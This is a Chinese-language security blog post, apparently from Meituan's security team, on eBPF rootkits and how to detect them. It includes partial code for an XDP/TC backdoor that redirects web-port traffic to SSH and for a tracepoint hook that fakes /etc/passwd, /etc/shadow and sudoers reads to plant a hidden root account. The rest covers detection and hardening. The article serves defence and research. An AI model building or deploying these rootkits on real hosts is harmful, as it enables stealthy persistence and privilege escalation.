酷应用

浅谈一下，Linux中基于eBPF的恶意利用与检测机制

百家作者：美团安全应急响应中心 2022-03-09 18:13:39

//?文丨陈驰??杨一??胡鑫博

陈驰，2017年加入美团，目前主要负责IDC服务器的检测防御产品研发，完善服务器侧纵深防御体系建设。
杨一，2017年加入美团，目前主要负责HIDS主机安全产品研发工作。
胡鑫博，2021年加入美团，目前主要负责HIDS Agent的研发。

前言??

近几年来，云原生领域飞速发展，k8s成为公认的云操作系统。容器的高频率部署、短暂的生命周期、复杂的网络路由，都给内核带来了新的挑战。系统内核在面对复杂性不断增长，性能、可扩展性新需求的同时，还需要保障系统稳定可用，这是极其困难的事情。

eBPF出现，以较小的子系统改动，保障了系统内核的稳定。具备实时动态加载的特性，将业务逻辑加载到内核，实现热更新的动态执行。eBPF技术的出现，衍生新业务场景的同时，也带来了安全威胁。

现状分析??

在解决很多技术难题的同时，eBPF技术的出现也带来了新的恶意利用，从一些海外资料和国内资料中可以看到，目前关于eBPF技术恶意利用的现状如下所示：

??海外资料

· Black Hat

在Black Hat 2021的峰会中，Datadog工程师Guillaume Fournier分享了《With Friends Like eBPF, Who Needs Enemies?》^{[文末链接-1]}介绍了eBPF的恶意利用，如何构建一个rootkit，入侵者会如何利用。并把代码放在https://github.com/Gui774ume/ebpfkit上，包括检测防御代码。

· DEF CON

在DEF CON29峰会上，安全研究员Pat Hogan也分享了一篇关于eBPF的恶意利用案例：《Warping Reality - creating and countering the next generation of Linux rootkits using eBPF》^{[文末链接-2]}?，介绍了eBFP rootkit的应用场景，包括网络、运行时等，以及如何检测eBPF的恶意利用等。代码在https://github.com/pathtofile/bad-bpf 。

?国内资料

国内在eBPF恶意利用的资料较少，相关技术分享也少，它的危害没有得到国内同行的注意，势必影响到国内公司在网络安全防御体系的建设，导致落后于国外，给企业安全甚至国家安全带来较大风险。笔者作为防御体系建设方，有责任带领大家更好的认识这种恶意利用，分享检测防御经验，加固网络安全产品，为国内信息安全建设贡献一份力。

??eBPF技术恶意利用的攻击原理

知己知彼才能百战不殆，要想做好防御，必须要了解他的攻击原理，我们一起来看下他的rootkit是如何设计的，功能有哪些？

从eBPF的功能来看，提供了

网络
监控
观测
跟踪&性能分析
安全

等几个领域功能。在网络领域，Cilium等云原生公司做了很多网络层的产品，在实现网格管理的同时，也做了响应的网络层面安全策略，尤其是网络编排领域，表现尤为亮眼，逐步代替iptables等产品，大有一统江山的趋势。在监控、观测等领域也有很多产品。尤其是运行时安全领域，Datadog 、Falco、Google等公司，都推出了相应的产品。笔者在博客上也有过相关产品源码分析的分享。

我们回顾一下eBPF技术的hook点：

从图中可以看出，eBPF的hook点功能包括以下几部分：

可以在Storage、Network等与内核交互之前
也可以在内核中的功能模块交互之间
又可以在内核态与用户态交互之间
更可以在用户态进程空间

eBPF的功能覆盖XDP、TC、probe、socket等，每个功能点都能实现内核态的篡改行为，从而使得用户态完全致盲，哪怕是基于内核模块的HIDS，一样无法感知这些行为。

笔者基于eBPF的功能函数，从业务场景来看，网络、监控、观测类的功能促进了云原生领域的产品发展；跟踪/性能分析、安全类功能，加快了安全防御、审计类产品演进；而安全领域的恶意利用，也会成为黑客关注的方向。在这里，笔者与大家探讨一下新的威胁与防御思路：

从数据流所处阶段来看，笔者划分为两部分，接下来一起来讨论恶意利用、风险危害与防御思路。

Linux网络层恶意利用
Linux系统运行时恶意利用

??网络层恶意利用

以一个SSH、WEB服务的服务器为例，在IDC常见网络访问策略中，开放公网web 80端口允许任意来源的IP访问。而SSH服务只允许特定IP，或者只开放内网端口访问。

假设这台服务器已经被黑客入侵，黑客需要留下一个后门，且需要一个隐藏、可靠的网络链路作为后门通道，那么在eBPF技术上，会如何实现呢？

·?XDP/TC层修改TCP包

为了让后门隐藏的更好，最好是不开进程，不监听端口（当前部分我们只讨论网络层隐藏）。而eBPF技术在XDP、TC、socket等内核层的功能，能够实现流量信息修改，这些功能常被应用在L3、L4的网络负载均衡上。比如cilium的网络策略都是基于eBPF XDP实现。eBPF hook了XDP点后，更改了TCP包的目标IP，系统内核再将该数据包转发出去。按照XDP与TC在Linux内核中，处理ingress与egress的位置，可以更准确地确定hook点。

XDP的BPF_PROG_TYPE_XDP程序类型，可以丢弃、修改、重传来自ingress的流量，但无法对egress起作用。TC的BPF_PROG_TYPE_SCHED_CLS除了拥有XDP BPF_PROG_TYPE_XDP的功能外，还可以对egress起作用。

前者最常用的场景就是做网络防火墙，用于网络流量清洗，效率比传统防火墙的高很多。后者常用于云原生场景下，容器、POD的网络监控、安全访问控制等。在这个例子中，要多进出流量都做调整，故两个hook点都需要有。同样，在XDP等阶段的hook，在这里做相关包逻辑处理，能更好的将通讯包隐藏，tcpdump等工具都抓不到。

控制链路

在后门场景里，可以在同样的位置，像eBPF的负载均衡一样，修改目标端口，从web nginx 的80改为SSHD的22，就可以实现网络数据的透传，绕开防火墙以及网络访问限制。

认证密钥

由于后门rootkit是在XDP\TC层工作，为了尽可能的简单，认证密钥最好只使用链路层、网络层、传输层的数据，即MAC信息、IP五元组之类。IP经常变动，MAC地址大概率是唯一的，以及设定一个固定的端口，这样更加唯一，作为rootkit的认证密钥即可实现。（需要client发起连接时，指定客户端的TCP端口）

eBPF uprobe与eBPF map联动

对于后门rootkit的密钥更新，利用eBPF也很好实现。比如，在nginx的场景中，uprobe实现hook http的函数，获取url参数中特定字符串，再将字符串保存到eBPF map里，就实现了密钥更新。

XDP/TC层的eBPF rootkit执行时，读取eBPF map里的密钥，进行比较运算。

·?实现流程

举个XDP处理ingress的例子：

 1SEC("xdp/ingress")
 2int?xdp_ingress(struct?xdp_md?*ctx)?{
 3struct?cursor?c;
 4struct?pkt_ctx_t?pkt;
 5
 6//判断是否为SSHD的协议，不是则直接放行
 7if?(!(不是SSHD协议(&c)))?{
 8return?XDP_PASS;
 9}
10
11//判断rootkit是否匹配，网卡信息与来源端口是否匹配
12hack_mac[]?=?"读取bpf map配置。"
13if(密钥不匹配)?{
14return?XDP_PASS;
15}
16
17//?读取map，是否已经存在该client信息
18struct?netinfo?client_key?=?{};
19__builtin_memcpy(&client_key.mac,?&pkt.eth->h_source,?ETH_ALEN);
20
21struct?netinfo?*client_value;
22client_value?=?bpf_map_lookup_elem(&ingress_client,?&client_key);
23
24//?如果没找到伪装信息，则自己组装
25if(!client_value)?{
26__builtin_memset(&client_value,?0,?sizeof(client_value));
27}?else?{
28bpf_map_update_elem(&ingress_client,?&client_key,?&client_value,?BPF_ANY);
29}
30
31
32//?伪装mac局域网mac信息
33pkt.eth->h_source[0]?=?0x00;
34...
35
36//?替换伪装ip来源?，客户端端口不变
37
38//?更改目标端口
39pkt.tcp->dest?=?htons(FACK_PORT);????//22
40
41//计算TCP?SUM?layer?4
42ipv4_csum(pkt.tcp,?sizeof(struct?tcphdr),?&csum);
43pkt.tcp->check?=?csum;
44
45//写入已伪装的map，用于TC处理egress的原mac、IP信息还原。
46return?XDP_PASS;
47}

比较简单的demo，即可实现 ingtrss侧TCP数据包的伪装。同样，TC层处理egress方向的数据包时，只需要对伪装包的原始信息作还原即可。整个流程如下图：

这样，rootkit的通讯链路并不影响正常用户访问，也没有对原系统做改动，隐蔽性特别好。

·?视频演示

笔者准备了三台主机测试：

入侵者：cnxct-mt2，IP为172.16.71.1。
普通用户：vmubuntu，IP为172.16.71.3。
被入侵服务器：vm-server，IP为172.16.71.4。开放nginx web 80端口；开放SSHD 22端口，并设定iptables规则只允许内网IP访问。

· 危害

这个rootkit不主动创建socket，借用其中一个网络发送包，把消息送达给后门使用者。对系统影响来说，只是一个不起眼的小网络响应。在万千HTTP包里，根本定位不到。

iptables防火墙绕过：利用对外开放的80端口作为通讯隧道；
webIDS绕过：流量到达服务器后，并不传递给nginx；
NIDS绕过：入侵者流量在局域网之间流传并无异常，只是无法解密；
HIDS绕过：是否信任了防火墙，忽略了本机/局域网来源的SSHD登录？

?Linux系统运行时恶意利用

云原生生态下，涌现大批基于eBPF技术实现的集群网络管理插件，比如Calico、cilium等。而业务实现网络管理服务是以容器化方式部署，且有需要给这些容器启用SYS_BPF_ADMIN权限以支持eBPF系统调用。这些服务的运行环境，也给攻击者留下一个完美的发挥空间。

· 实现流程

回顾eBPF的hook点，作用在syscall的kprobe、tracepoint事件类型，倘若用在后门rootkit场景，是十分可怕的。比如，修改内核态返回给用户态的数据，拦截阻断用户态行为等为所欲为。而更可怕的是，常见的HIDS都是基于内核态或者用户态做行为监控，这恰恰就绕开了大部分HIDS的监控，且不产生任何日志，简直细思极恐、不寒而栗。

tracepoint事件类型hook

在SSHD应用中，当用户登录时，会读取/etc/passwd等文件。用户态sshd程序，调用open、read等系统调用，让内核去硬件磁盘上检索数据，再返回数据给sshd进程。

用户态生成payload

用户态实现/etc/passwd、/etc/shadown等文件payload的生成，并通过eBPF的RewriteConstants机制，完成对elf .rodata的字段值替换。

 1import?"github.com/ehids/ebpfmanager"
 2
 3//??通过elf的常量替换方式传递数据
 4func?(e?*MBPFContainerEscape)?constantEditor()?[]manager.ConstantEditor?{
 5????var?username?=?RandString(9)
 6????var?password?=?RandString(9)
 7????var?s?=?RandString(8)
 8
 9????salt?:=?[]byte(fmt.Sprintf("$6$%s",?s))
10????//?use?salt?to?hash?user-supplied?password
11????c?:=?sha512_crypt.New()
12????hash,?err?:=?c.Generate([]byte(password),?salt)
13
14????var?m?=?map[string]interface{}{}
15????res?:=?make([]byte,?PAYLOAD_LEN)
16????var?payload?=?fmt.Sprintf("%s?ALL=(ALL:ALL)?NOPASSWD:ALL?#",?username)
17????copy(res,?payload)
18????m["payload"]?=?res
19????m["payload_len"]?=?uint32(len(payload))
20
21????//?生成passwd字符串
22????var?payload_passwd?=?fmt.Sprintf("%s:x:0:0:root:/root:/bin/bash\n",?username)
23????//?生成shadow字符串
24????var?payload_shadow?=?fmt.Sprintf("%s:%s:18982:0:99999:7:::\n",?username,?hash)
25
26????//?eBPF?RewriteContants
27????var?editor?=?[]manager.ConstantEditor{
28????????{
29????????????Name:??????????"payload",
30????????????Value:?????????m["payload"],
31????????????FailOnMissing:?true,
32????????},
33????????{
34????????????Name:??????????"payload_len",
35????????????Value:?????????m["payload_len"],
36????????????FailOnMissing:?true,
37????????????},
38????}
39????return?editor
40}
41
42func?(this?*MBPFContainerEscape)?setupManagers()?{
43????this.bpfManager?=?&manager.Manager{
44????????Probes:?[]*manager.Probe{
45????????????{
46????????????????Section:??????????"tracepoint/syscalls/sys_enter_openat",
47????????????????EbpfFuncName:?????"handle_openat_enter",
48????????????????AttachToFuncName:?"sys_enter_openat",
49????????????},
50????????????...
51????????},
52
53????????Maps:?[]*manager.Map{
54????????????{
55????????????????Name:?"events",
56????????????},
57????????},
58????}
59
60????this.bpfManagerOptions?=?manager.Options{
61????????...
62????????//?填充?RewriteContants?对应map
63????????ConstantEditors:?this.constantEditor(),
64????}
65}

内核态使用payload

 1const?volatile?int?payload_len?=?0;
 2...
 3const?volatile?char?payload_shadow[MAX_PAYLOAD_LEN];
 4
 5SEC("tracepoint/syscalls/sys_exit_read")
 6int?handle_read_exit(struct?trace_event_raw_sys_exit?*ctx)
 7{
 8????//?判断是否为rootkit行为，是否需要加载payload
 9????...
10????long?int?read_size?=?ctx->ret;
11????//?判断原buff长度是否小于payload
12????if?(read_size?<?payload_len)?{
13????????return?0;
14????}
15
16????//?判断文件类型，匹配追加相应payload
17????switch?(pbuff_addr->file_type)
18????{
19????case?FILE_TYPE_PASSWD:
20????????//?覆盖payload到buf，不足部分使用原buff内容
21????????{
22????????????bpf_probe_read(&local_buff,?MAX_PAYLOAD_LEN,?(void*)buff_addr);
23????????????for?(unsigned?int?i?=?0;?i?<?MAX_PAYLOAD_LEN;?i++)?{
24????????????????if?(i?>=?payload_passwd_len)?{
25????????????????????local_buff[i]?=?'?';
26????????????????}
27????????????????else?{
28????????????????????local_buff[i]?=?payload_passwd[i];
29????????????????}
30????????????}
31????????}
32????????break;
33????case?FILE_TYPE_SHADOW:
34????????//?覆盖?shadow文件
35????????...
36????????break;
37????case?FILE_TYPE_SUDOERS:
38????????//覆盖sudoers
39????????...
40????????break;
41????default:
42????????return?0;
43????????break;
44????}
45
46
47????//?将payload内存写入到buffer
48????ret?=?bpf_probe_write_user((void*)buff_addr,?local_buff,?MAX_PAYLOAD_LEN);
49????//?发送事件到用户态
50
51????return?0;
52}

按照如上demo rootkit的设计，即完成了随机用户名密码的root账号添加。在鉴权认证上，也可以配合eBPF网络层恶意利用的demo，利用eBPF map交互，实现相应鉴权。但rootkit本身并没有更改硬盘上文件，不产生风险行为。并且，只针对特定进程的做覆盖，隐蔽性更好。整个流程如下图：

不管是在物理机上，还是给了root+BPF权限的容器上，都一样生效。

· 视频演示

· 危害

云原生场景下，赋予SYS_ADMIN的权限的容器场景很多，若配合近期的JAVA log4j漏洞，直接击穿容器，拿到宿主机权限，是不是很可怕？

然而，比这可怕的是这种rootkit本身并没有产生用户态行为日志，也没有改文件，系统里查不到这个用户信息。整个后门行为不产生数据，让大部分HIDS失灵。

? 综述

从笔者演示的这两个场景可以来看，大家已经知道eBPF技术被恶意利用的危害。其实，这只是eBPF技术的冰山一角，在kproeb\uprobe上也有很多功能，比如实现进程隐藏，无痕内网扫描等等。相关恶意利用可参考《Bad BPF - Warping reality using eBPF》^{[文末链接-3]}一文。

若入侵者精心设计rootkit，实现进程隐藏等，让rootkit更加隐蔽，按照本文的思路，实现一个幽灵般的后门，想想就让人后怕。

常规的主机安全防御产品一般用netlink linux kernel module等技术实现进程创建、网络通讯等行为感知，而eBPF的hook点可以比这些技术更加深，比他们执行更早，意味着常规HIDS并不能感知发现他们。

传统rootkit，采用hook api方法，替换原来函数，导致执行函数调用地址发生变化，已有成熟检测机制，eBPF hook不同于传统rootkit ，函数调用堆栈不变。这给检测带来很大的麻烦。

那面对这种后门，该如何检测防御呢？

检测防御??

从事件发生的过程来看，分为三个阶段：

运行前
运行时
运行后

??运行前?

在恶意程序运行前，减少攻击面，这个思路是更古不变的。

·?环境限制

不管是宿主机还是容器，都进行权限收敛，能不赋予SYS_ADMIN、CAP_BPF等权限，就禁止掉。若一定要开放这个权限，那么只能放到运行时的检测环节了。

·?seccomp限制?

在容器启动时，修改默认seccomp.json，禁止bpf系统调用，防止容器逃逸，注意此方法对于Privileged特权容器无效。

·?内核编译参数限制

修改函数返回值做运行时防护时，需要用到bpf_override_return，该函数需要内核开启CONFIG_BPF_KPROBE_PVERRIDE编译参数，因此非特殊情况不要开启该编译参数。

·?非特权用户指令?

大部分eBPF程序类型都需要root权限的用户才能调用执行。但有几个例外，比如BPF_PROG_TYPE_SOCKET_FILTER和BPF_PROG_TYPE_CGROUP_SKB这两个类型，就不需要root。但需要读取系统配置开关。

1//https://elixir.bootlin.com/linux/v5.16.9/source/kernel/bpf/syscall.c#L2240
2
3if?(type?!=?BPF_PROG_TYPE_SOCKET_FILTER?&&
4????????type?!=?BPF_PROG_TYPE_CGROUP_SKB?&&
5????????!bpf_capable())
6????????return?-EPERM;

开关确认

在/proc/sys/kernel/unprivileged_bpf_disabled里，可通过执行sysctl kernel.unprivileged_bpf_disabled=1来修改配置。配置含义见Documentation for /proc/sys/kernel/?^{[文末链接-4]}

值为0表示允许非特权用户调用bpf
值为1表示禁止非特权用户调用bpf且该值不可再修改，只能重启后修改
值为2表示禁止非特权用户调用bpf，可以再次修改为0或1

·?特征检查?

有人提议，在内核加载bpf字节码时，进行签名验证，以便达到只加载安全签名的bpf字节码。lwn.net中也列出这个话题：BPF字节码签名计划^{[文末链接-5]}。

但很多人也提出反对意见^{[文末链接-6]}?，认为bpf模块这几年的发展，过于抽象化，越来越复杂，不希望加入额外的功能，让bpf更加不稳定。而是改变思路，让字节码加载时签名，改为「执行bpf字节码加载的用户态程序进行签名」，这个是已有的内核功能，不会增加系统复杂性。

笔者认为，这确实可以缓解大部分bpf字节码加载的问题。但使用系统原生命令(tc\ip\bpftool等)加载的话，仍面临威胁。比如：ip link set dev ens33 xdp obj xdp-example_pass.o

· 运行检查

大部分eBPF程序在重启后不存在了，所以，入侵者会尽可能让后门自启动。对于linux系统的自启动、crontab等计划任务做好检查。

用户态程序可以以各种形式存在，ELF可执行文件、ELF so动态链接库都可以。在执行时，必定会调用BPF syscall来加载BPF 字节码。若只是对可执行ELF做检测，还不够准确。

??运行时

· 监控?

linux系统中，所有的程序运行，都必须进行系统调用，eBPF程序也不例外。需要调用syscall为321的SYS_BPF指令。

并且，所有的eBPF程序执行、map创建都必须进行这个syscall调用。那么，在这个必经之路进行拦截监控，是最好的方案。

 1SEC("tracepoint/syscalls/sys_enter_bpf")
 2int?tracepoint_sys_enter_bpf(struct?syscall_bpf_args?*args)?{
 3????struct?bpf_context_t?*bpf_context?=?make_event();
 4????if?(!bpf_context)
 5????????return?0;
 6????bpf_context->cmd?=?args->cmd;
 7????get_common_proc(&bpf_context->procinfo);
 8????send_event(args,?bpf_context);
 9????return?0;
10}

这里，我们开源的ehids项目做了一个bpf syscall检测的例子，大家可以fork了解。仓库见https://github.com/ehids/ehids-agent^{[文末链接-7]}

当然，细心的读者会有疑问，假如入侵者的后门执行比较早，对这个系统调用进行欺骗，那怎么办呢？这是个好问题，我们放到运行后的溯源章节讨论。但对于大部分场景，HIDS防御产品还是可以做到第一时间启动的。

·?审计&筛查?

上面我们讨论了对bpf系统调用进行监控，在云原生场景中，基于eBPF实现的网络产品会频繁调用，会产生大量的事件日志，给运营同学带来较大压力。对行为做精简、做精确筛选就成为接下来的目标。

根据程序白名单筛选

数据过滤，是解决大量数据压力的方案。在一些BPF应用的业务服务器上，本身业务行为会产生大量调用，会给安全预警带来较大审计压力。对于已知的进程，可以根据进程特征过滤。

获取当前进程PID、COMM等特征，根据用户态写入eBPF map的配置，决定是否上报、是否拦截。也可以在用户态做过滤，但内核态效率更高。如果是做拦截，那必须要在内核态实现。参考saBPF产品设计思路^{[文末链接-8]}，用eBPF实现LSM HOOK点的钩子程序，完成相关审计调用。https://github.com/saBPF-project/sabpf-kernel?项目代码还只是demo，思路可以借鉴。

·?根据SYSCALL类型筛选?

在BPF syscall里，子命令的功能包含MAP、PROG等多种类型的操作bpf() subcommand reference^{[文末链接-9]}里有详细的读写API。在实际的业务场景里，写的安全风险比读大。所以，我们可以过滤掉读操作，只上报、审计写操作。比如：

MAP的创建BPF_MAP_CREATE
PROG加载BPF_PROG_LOAD
BPF_OBJ_PIN
BPF_PROG_ATTACH
BPF_BTF_LOAD
BPF_MAP_UPDATE_BATCH

尤其是有BPF需求的业务场景，可以更好的审计日志。

? 运行后

问个问题，eBPF用户态程序与内核态程序交互，加载bpf字节码后，能退出吗？退出后，内核hook的bpf函数还工作吗？创建的map是否还存在？后门程序为了保证更好的隐蔽性，会如何选择？

要回答这个问题，不得不提BPF程序的加载机制，BPF对象生命周期。

·?文件描述符与引用计数器?

用户态程序通过文件描述符FD来访问BPF对象（progs、maps、调试信息），每个对象都有一个引用计数器。用户态打开、读取相应FD，对应计数器会增加。若FD关闭，引用计数器减少，当refcnt为0时，内核会释放BPF对象，那么这个BPF对象将不在工作。

在安全场景里，用户态的后门进程若退出后，后门的eBPF程序也随之退出。在做安全检查时，这可以作为一个有利特征，查看进程列表中是否包含可疑进程。

但并非所有BPF对象都会随着用户态进程退出而退出。从内核原理来看，只需要保证refcnt大于0，就可以让BPF对象存活，让后门进程持续工作了。其实在BPF的程序类型中，像XDP、TC和基于CGROUP的钩子是全局的，不会因为用户态程序退出而退出。相应FD会由内核维护，保证refcnt计数器不为零，从而继续工作。

·?溯源?

在安全工程师视角里，就需要根据不同场景作不同的溯源策略。笔者给的溯源方式中，都使用了eBPF的相关接口，意味着，如果恶意程序比检查工具运行的早，那么对于结果存在伪造的可能。

短生命周期

BPF程序类型代表

k[ret]probe
u[ret]probe
tracepoint
raw_tracepoint
perf_event
socket filters
so_reuseport

特点是基于FD管理，内核自动清理，对系统稳定性更好。这种程序类型的后门，在排查时特征明显，就是用户态进程。并且可以通过系统正在运行的BPF程序列表中获取。

bpftool工具

eBPF程序列表?命令bpftool prog show，以及bpftool prog help查看更多参数。

结果中，可以看到当前系统正在运行的BPF程序、关联的BPF map ID，以及对应的进程信息等。另外，细心的你可能发现，结果中，XDP数据中并没有进程ID信息，稍后讨论。

eBPF map列表?命令bpftool map show，以及bpftool map help查看更多参数。

通过查看map信息，可以与程序信息作辅助矫正。并且，可以导出map内数据用来识别恶意进程行为。这部分我们在取证章节讨论。

bpflist-bpfcc

bpflist-bpfcc -vv命令可以看到当前服务器运行的部分BPF程序列表。以笔者测试环境为例：

1root@vmubuntu:/home/cfc4n/project/xdp#?bpflist-bpfcc??-vv
2open?kprobes:
3
4open?uprobes:
5
6PID????COMM?????????????TYPE??COUNT
71??????systemd??????????prog??8
810444??ehids????????????map???4
910444??ehids????????????prog??5

可以看到系统进程systemd启动了8个prog程序。ehids进程创建了4个eBPF map与5个prog。但实际上前面也执行了ip link set dev ens33 xdp obj xdp-example_pass.o命令，在这里却没有显示出来。意味着这个命令输出的结果并不是所有bpf程序、map的情况。

长生命周期

BPF程序类型代表

XDP
TC
LWT
CGROUP

上面提到以ip命令加载bpf字节码的场景，常见BPF工具查询不到或信息缺失。其背后原因，需要从他的工作原理讲起。

ip命令加载bpf原理

BPF对象的生命周期使用引用计时器管理，这一大原则是所有BPF对象都需要遵守的。而长生命周期的程序类型起FD是用户控件程序传递参数给内核空间，之后再由内核空间维持。

以前面提到的IP命令ip link set dev ens33 xdp obj xdp-example_pass.o为例。IP命令的参数中包含bpf字节码文件名，IP进程打开.o字节码的fd，通过NETLINK发IFLA_XDP类型消息（子类型IFLA_XDP_FD）给内核，内核调用dev_change_xdp_fd函数，由网卡接管FD，引用计数器递增，用户空间的IP进程退出后，BPF程序依旧工作。内核源码见：

https://elixir.bootlin.com/linux/v5.16.10/source/tools/lib/bpf/netlink.c#L237

笔者做了抓包验证，IP关联XDP程序类型：

 117:53:22.553708?sendmsg(3,?
 2????{
 3????msg_name={sa_family=AF_NETLINK,?nl_pid=0,?nl_groups=00000000},?
 4????msg_namelen=12,?
 5????msg_iov=[
 6????????{
 7????????????iov_base={
 8????????????????{nlmsg_len=52,?nlmsg_type=RTM_NEWLINK,?nlmsg_flags=NLM_F_REQUEST|NLM_F_ACK,?nlmsg_seq=1642672403,?nlmsg_pid=0},?
 9????????????????{ifi_family=AF_UNSPEC,?ifi_type=ARPHRD_NETROM,?ifi_index=if_nametoindex("ens33"),?ifi_flags=0,?ifi_change=0},?
10????????????????{
11????????????????????{nla_len=20,?nla_type=IFLA_XDP},?
12????????????????????[
13????????????????????????{{nla_len=8,?nla_type=IFLA_XDP_FD},?6},?
14????????????????????????{{nla_len=8,?nla_type=IFLA_XDP_FLAGS},?XDP_FLAGS_UPDATE_IF_NOEXIST}
15????????????????????]
16????????????????}
17????????????},
18????????????iov_len=52
19????????}
20????????],?
21????msg_iovlen=1,?
22????msg_controllen=0,?
23????msg_flags=0
24????},?0)?=?52

可以看到IFLA_XDP_FD后面的FD参数是6。同样，删除XDP程序，需要把FD设置为-1，对应NETLINK包构成如下：

 117:55:16.306843?sendmsg(3,?
 2????{
 3????...
 4????????????????????{nla_len=20,?nla_type=IFLA_XDP},?
 5????????????????????[
 6????????????????????????{{nla_len=8,?nla_type=IFLA_XDP_FD},?-1},?
 7????????????????????????{{nla_len=8,?nla_type=IFLA_XDP_FLAGS},?XDP_FLAGS_UPDATE_IF_NOEXIST}
 8????????????????????]?}
 9????...
10????},?0)?=?52

不止IP命令，TC命令分类器?^{[文末链接-10]}?也是支持BPF程序，将BPF程序作为classifiers和 actions加载到 ingress/egress hook点。背后原理与IP类似，也是netlink协议与内核通讯，网卡维持BPF对象计数器。

检测机制

使用原生IP、TC等命令，查看网卡加载的BPF对象。

ip link show
tc filter show dev [网卡名] [ingress|egress]

使用bpftool命令查看

bpftool net show dev ens33 -p命令可以用于查看网络相关的eBPF hook点。

CGROUP的的BPF_PROG_TYPE_CGROUP_SKB、BPF_PROG_TYPE_CGROUP_SOCK类型程序的加载情况都可以通过bpftool prog show查看。长短生命周期的BPF程序区别是缺少用户空间进程PID信息。如下图：

BPFFS

除了前面提到的方法外，BPF文件系统BPFFS也是让BPF程序后台运行的方式。用户空间进程可以使用任意名字将BPF程序PIN到BPFFS。让在BPFFS来自动增加BPF对象的refcnt引用计数器，来保持后台的活跃状态。使用时，只需要使用bpf_obj_get(“BPFFS path”)就可以获得BPF对象的FD。

BPFFS在linux的类型是BPF_FS_MAGIC，默认目录/sys/fs/bpf/，可自定义修改，但确保文件系统类型是unix.BPF_FS_MAGIC。

检测思路上，需要关注虚拟文件系统是不是unix.BPF_FS_MAGIC类型。

在linux系统上，mount -t bpf来查看系统所有挂在的文件类型，是否包含BPFFS类型。

确定BPFFS的目录后，再查看目录下的挂在点是否存在异常。

·?取证?

内核已加载的BPF对象导出

bpftool工具可以导出有FD ID的PROG、MAP。?BPF PROG程序?可以导出opcode\visual\linum等多种格式，并可以生成调用关系图。具体可以查看bpftool的帮助文件。

1root@vmubuntu:/home/cfc4n#?bpftool?prog?help
2bpftool?prog?dump?xlated?PROG?[{?file?FILE?|?opcodes?|?visual?|?linum?}]
3bpftool?prog?dump?jited??PROG?[{?file?FILE?|?opcodes?|?linum?}]

BPF MAP?与PROG类似，也可以通过bpftool导出内容，并支持json格式化内容。

 1root@vmubuntu:/home/cfc4n#?bpftool?map?dump?id?20
 2[{
 3????????"value":?{
 4????????????".rodata":?[{
 5????????????????????"target_ppid":?0
 6????????????????},{
 7????????????????????"uid":?0
 8????????????????},{
 9????????????????????"payload_len":?38
10????...

BPFFS?BPFFS类型的BPF对象，虽然可以更便捷的放到后台执行，用户空间程序可以退出，也可以再次读取，但这也给取证带来很大便利。bpftool命令也支持从pinned到BPFFS文件系统的路径里导出PROG、MAP。参与少有区别，详情见bpftool help。

内核未加载的BPF对象

当定位到后门rootkit的用户空间程序后，那么BPF字节码肯定会被其调用。字节码内容一般会放在一个独立文件中，或者作为字节码编译到当前程序里。这也只需要使用IDA之类反编译工具，定位到相关字节流，导出即可。

以笔者演示视频中的ehids进程为例，使用https://github.com/ehids/ebpfmanager?纯GO的eBPF模块管理器package，对于eBPF字节码会使用github.com/shuLhan/go-bindata/cmd/go-bindata包对BPF字节码进行加载、GZIP压缩，作为go代码的变量，在部署时比较边界。

IDA pro加载时，我们可以在.noptrdata段部分看到这块代码，开始地址是0000000000827AE0，导出后再解压，可以还原原来的BPF ELF文件内容。

因为每个BPF用户态实现不同，类库也不一样，静态分析实践起来有难度。那可以模拟相同环境，动态运行，提前HOOK BPF SYSCALL，找到FD设置的地方，也是可以导出BPF的ELF文件。

字节码分析

BPF字节码本身也是ELF格式，只是格式指令上有一定区别。反编译工具IDA pro也能支持，国外安全工程师开源了一个python插件：eBPF IDA Proc?^{[文末链接-11]}?，以及整理了一篇分析的文章《Reverse Engineering Ebpfkit Rootkit With BlackBerry's Enhanced IDA Processor Tool 》^{[文末链接-12]}，有兴趣可以读读。

? 防御?

eBPF在网络安全场景的使用，除了做入侵检测外，还是可以用于防御。LSM PROBE HOOK提供了相关功能。以容器逃逸场景为例，行为最明显的特征是父子进程的namespace不一致，子进程创建完成后，判断这个特征是否匹配，返回EPERM覆盖进程创建函数的返回值，从而起到防御的目的。相比内核模块等防御实现，eBPF实现更加安全、稳定、可靠，从而在源头上解决容器逃逸的问题。

同样，笔者认为eBPF也是二进制层最优秀的虚拟补丁、热更新解决方案。

1LSM_PROBE(bpf,?int?cmd,?union?bpf_attr?*attr,?unsigned?int?size)
2{
3????return?-EPERM;
4}

在系统的配置上有一定要求，CONFIG_BPF_LSM=y，CONFIG_LSM配置内容，必须包含bpf等，详情可参考BCC类库Demo lsm probe?^{[文末链接-13]}?。

工程实现??

? 练手

入门练手，可以尝试使用BCC的类库：https://github.com/iovisor/bcc?，以及C语言用户空间程序的各种Demo例子Demo BPF applications?^{[文末链接-14]}。

??类库选择

工程化时，对项目质量、稳定性、研发效率等都有要求，推荐cilium的纯go eBPF类库，由cilium官方背书可放心使用。datadog公司的agent产品也是用这个类库。

笔者的产品也是参考datadog，抽象包装了cilium的eBPF库，实现配置化便捷管理eBPF程序。github仓库：https://github.com/ehids/ebpfmanager?，欢迎使用。

当然，也可以使用libbpf包装的go类库实现，比如tracee等产品。

??系统兼容性 CO-RE

eBPF的出现极大的简化了编写内核态代码的门槛，极高的安全性，友好的加载方式，高效的数据交互，令eBPF深受追捧。然而和编写传统内核模块相同，内核态的功能开发伴随着繁冗的适配测试工作，Linux繁多的内核版本更是让适配这件事难度陡增，这也就是BTF出现之前的很长一段时间里，bcc + clang + llvm被人们诟病的地方。程序在运行的时候，才进行编译，目标机器还得安装clang llvm kernel-header等编译环境，同时编译也会消耗大量cpu资源，这在某些高负载机器上是不能被接受的。

因此BTF&CO-RE横空出现，BTF可以理解为一种debug符号描述方式，此前传统方式debug信息会非常巨大，linux内核一般会关闭debug符号，btf的出现解决了这一问题，大幅度减少debug信息的大小，使得生产场景内核携带debug信息成为可能。

可喜的是通过运用这项技术，可以帮助开发者节省大量适配精力，但是这项技术目前还是在开发中，还有许多处理不了的场景，比如结构体成员被迁入子结构体中，这时候还是需要手动解决问题，BTF的开发者也写了一篇文章，讲解不同场景的处理方案bpf-core-reference-guide?^{[文末链接-15]}。

? 大型项目

在国外，云原生领域产品发展较快，涌现出一批批基于eBPF的产品，包括Cilium、Datadog 、Falco、Katran等，应用在网络编排、网络防火墙、跟踪定位、运行时安全等各个领域，可以借鉴这些大型项目的研发经验，来加快产品建设，包括多系统兼容、框架设计、项目质量、监控体系建设等。本篇以检测防御为主，工程建设相关经验我们在以后的文章中分享。

总结??

